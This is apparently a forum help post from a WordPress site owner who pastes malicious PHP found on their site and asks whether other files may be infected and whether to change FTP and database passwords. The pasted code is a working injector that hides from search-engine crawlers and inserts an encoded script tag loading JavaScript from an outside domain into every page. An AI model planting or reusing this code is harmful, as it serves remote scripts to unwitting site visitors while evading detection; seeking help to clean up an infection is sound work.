Guest
G
Here you go:
Could this have infected any other files outside of Wordpress? Image files etc?
Would it be wise to change my FTP password and database information?
if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])) {
$GLOBALS['mr_no']=1;
if(!function_exists('mrobh')) {
if(!function_exists('gml')) {
function gml() {
if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))) {
return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly93d3cua2Rqa2Zqc2tkZmpsc2tkamYuY29tL2pzLnBocCI+PC9zY3JpcHQ+");
}
return "";
}
}
if(!function_exists('gzdecode')) {
function gzdecode($R5A9CF1B497502ACA23C8F611A564684C) {
$R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));
$RBE4C4D037E939226F65812885A53DAD9=10;
$RA3D52E52A48936CDE0F5356BB08652F2=0;
if($R30B2AB8DC1496D06B230A71D8962AF5D&4) {
$R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
$R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
$RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
}
if($R30B2AB8DC1496D06B230A71D8962AF5D&8) {
$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
}
if($R30B2AB8DC1496D06B230A71D8962AF5D&16) {
$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
}
if($R30B2AB8DC1496D06B230A71D8962AF5D&2) {
$RBE4C4D037E939226F65812885A53DAD9+=2;
}
$R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
if($R034AE2AB94F99CC81B389A1822DA3353===FALSE) {
$R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
}
return $R034AE2AB94F99CC81B389A1822DA3353;
}
}
function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B) {
Header('Content-Encoding: none');
$RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)) {
return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
} else {
return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
}
}
ob_start('mrobh');
}
}